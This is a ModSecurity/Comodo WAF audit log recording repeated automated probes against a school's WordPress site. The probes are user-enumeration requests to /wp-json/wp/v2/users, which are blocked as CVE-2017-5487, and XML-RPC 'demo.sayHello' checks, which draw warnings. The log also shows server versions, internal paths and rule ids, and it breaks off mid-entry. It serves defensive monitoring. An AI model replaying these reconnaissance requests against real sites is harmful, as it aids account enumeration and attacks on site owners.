Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78f77255-Z-- --13d00262-A-- [17/May/2025:08:33:40 +0700] aCfndOm4kjNN-hEbWjJBAgAAAEo 103.236.140.4 44096 103.236.140.4 8181 --13d00262-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.156 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --13d00262-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13d00262-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445620417332 3239 (- - -) Stopwatch2: 1747445620417332 3239; combined=1386, p1=476, p2=877, p3=0, p4=0, p5=33, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --13d00262-Z-- --990f5a3d-A-- [17/May/2025:08:33:40 +0700] aCfndOm4kjNN-hEbWjJBAwAAAEs 103.236.140.4 44098 103.236.140.4 8181 --990f5a3d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.162.49 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.162.49 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --990f5a3d-C-- demo.sayHello --990f5a3d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --990f5a3d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445620418408 5387 (- - -) Stopwatch2: 1747445620418408 5387; combined=4043, p1=515, p2=3310, p3=30, p4=34, p5=91, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --990f5a3d-Z-- --d010307a-A-- [17/May/2025:08:33:46 +0700] aCfneum4kjNN-hEbWjJBBwAAAFE 103.236.140.4 44106 103.236.140.4 8181 --d010307a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.179.156 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.179.156 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --d010307a-C-- demo.sayHello --d010307a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --d010307a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445626488350 5948 (- - -) Stopwatch2: 1747445626488350 5948; combined=4093, p1=518, p2=3321, p3=42, p4=43, p5=100, sr=65, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d010307a-Z-- --519bf406-A-- [17/May/2025:08:34:01 +0700] aCfniem4kjNN-hEbWjJBDwAAAEQ 103.236.140.4 44126 103.236.140.4 8181 --519bf406-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.36 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --519bf406-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --519bf406-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445641910970 2998 (- - -) Stopwatch2: 1747445641910970 2998; combined=1300, p1=443, p2=823, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --519bf406-Z-- --58a05823-A-- [17/May/2025:08:34:07 +0700] aCfnj-m4kjNN-hEbWjJBEQAAAEg 103.236.140.4 44130 103.236.140.4 8181 --58a05823-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.170.36 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.170.36 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --58a05823-C-- demo.sayHello --58a05823-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --58a05823-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445647513151 4881 (- - -) Stopwatch2: 1747445647513151 4881; combined=3565, p1=506, p2=2877, p3=25, p4=28, p5=77, sr=64, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58a05823-Z-- --da49ef2e-A-- [17/May/2025:08:34:16 +0700] aCfnmOm4kjNN-hEbWjJBEgAAAEk 103.236.140.4 44134 103.236.140.4 8181 --da49ef2e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --da49ef2e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --da49ef2e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445656487266 3119 (- - -) Stopwatch2: 1747445656487266 3119; combined=1332, p1=430, p2=872, p3=0, p4=0, p5=29, sr=77, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --da49ef2e-Z-- --7668407e-A-- [17/May/2025:08:34:21 +0700] aCfnnem4kjNN-hEbWjJBEwAAAEo 103.236.140.4 44138 103.236.140.4 8181 --7668407e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.191 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7668407e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7668407e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445661042068 3663 (- - -) Stopwatch2: 1747445661042068 3663; combined=1432, p1=507, p2=891, p3=0, p4=0, p5=34, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7668407e-Z-- --10df5b29-A-- [17/May/2025:08:34:21 +0700] aCfnnQTOsBn9MSWb6WJutQAAAIY 103.236.140.4 44140 103.236.140.4 8181 --10df5b29-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.83.59 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.83.59 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --10df5b29-C-- demo.sayHello --10df5b29-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --10df5b29-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445661767951 5371 (- - -) Stopwatch2: 1747445661767951 5371; combined=4374, p1=461, p2=3679, p3=38, p4=42, p5=90, sr=66, sw=64, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --10df5b29-Z-- --77c6a805-A-- [17/May/2025:08:34:26 +0700] aCfnoum4kjNN-hEbWjJBFwAAAFA 103.236.140.4 44150 103.236.140.4 8181 --77c6a805-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.102.191 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.102.191 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --77c6a805-C-- demo.sayHello --77c6a805-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --77c6a805-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445666658496 5782 (- - -) Stopwatch2: 1747445666658496 5782; combined=4264, p1=509, p2=3526, p3=29, p4=31, p5=99, sr=75, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --77c6a805-Z-- --58e69a5a-A-- [17/May/2025:08:34:27 +0700] aCfnowTOsBn9MSWb6WJutgAAAIU 103.236.140.4 44152 103.236.140.4 8181 --58e69a5a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.168 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --58e69a5a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58e69a5a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445667381967 1976 (- - -) Stopwatch2: 1747445667381967 1976; combined=1042, p1=364, p2=658, p3=0, p4=0, p5=19, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58e69a5a-Z-- --f060cc22-A-- [17/May/2025:08:34:35 +0700] aCfnq-m4kjNN-hEbWjJBGgAAAFU 103.236.140.4 44158 103.236.140.4 8181 --f060cc22-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.40.168 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.40.168 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --f060cc22-C-- demo.sayHello --f060cc22-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --f060cc22-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445675040237 5608 (- - -) Stopwatch2: 1747445675040237 5608; combined=4113, p1=542, p2=3348, p3=35, p4=35, p5=90, sr=78, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f060cc22-Z-- --bd89e466-A-- [17/May/2025:08:34:44 +0700] aCfntOm4kjNN-hEbWjJBHAAAAFc 103.236.140.4 44162 103.236.140.4 8181 --bd89e466-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.145 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd89e466-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd89e466-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445684646819 3451 (- - -) Stopwatch2: 1747445684646819 3451; combined=1485, p1=512, p2=937, p3=0, p4=0, p5=36, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd89e466-Z-- --4728ce61-A-- [17/May/2025:08:34:46 +0700] aCfntum4kjNN-hEbWjJBHQAAAFg 103.236.140.4 44164 103.236.140.4 8181 --4728ce61-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.254 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4728ce61-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4728ce61-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445686254742 2500 (- - -) Stopwatch2: 1747445686254742 2500; combined=1190, p1=381, p2=779, p3=0, p4=0, p5=30, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4728ce61-Z-- --1e769d4f-A-- [17/May/2025:08:34:52 +0700] aCfnvOm4kjNN-hEbWjJBIAAAAEU 103.236.140.4 44170 103.236.140.4 8181 --1e769d4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.190.145 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.190.145 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --1e769d4f-C-- demo.sayHello --1e769d4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --1e769d4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445692992036 5580 (- - -) Stopwatch2: 1747445692992036 5580; combined=4162, p1=556, p2=3381, p3=30, p4=31, p5=99, sr=80, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1e769d4f-Z-- --dbf9fb4f-A-- [17/May/2025:08:34:53 +0700] aCfnvQTOsBn9MSWb6WJutwAAAIg 103.236.140.4 44172 103.236.140.4 8181 --dbf9fb4f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.254 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.254 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dbf9fb4f-C-- demo.sayHello --dbf9fb4f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dbf9fb4f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747445693641212 5007 (- - -) Stopwatch2: 1747445693641212 5007; combined=3725, p1=446, p2=3067, p3=23, p4=25, p5=96, sr=75, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dbf9fb4f-Z-- --241d9957-A-- [17/May/2025:08:35:19 +0700] aCfn1-m4kjNN-hEbWjJBIwAAAEg 103.236.140.4 44178 103.236.140.4 8181 --241d9957-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.95.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --241d9957-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --241d9957-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445719806729 3175 (- - -) Stopwatch2: 1747445719806729 3175; combined=1378, p1=480, p2=868, p3=0, p4=0, p5=30, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --241d9957-Z-- --79c8031f-A-- [17/May/2025:08:35:22 +0700] aCfn2gTOsBn9MSWb6WJuuQAAAIs 103.236.140.4 44184 103.236.140.4 8181 --79c8031f-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.98.107 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.98.107 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --79c8031f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --79c8031f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747445722255365 2270 (- - -) Stopwatch2: 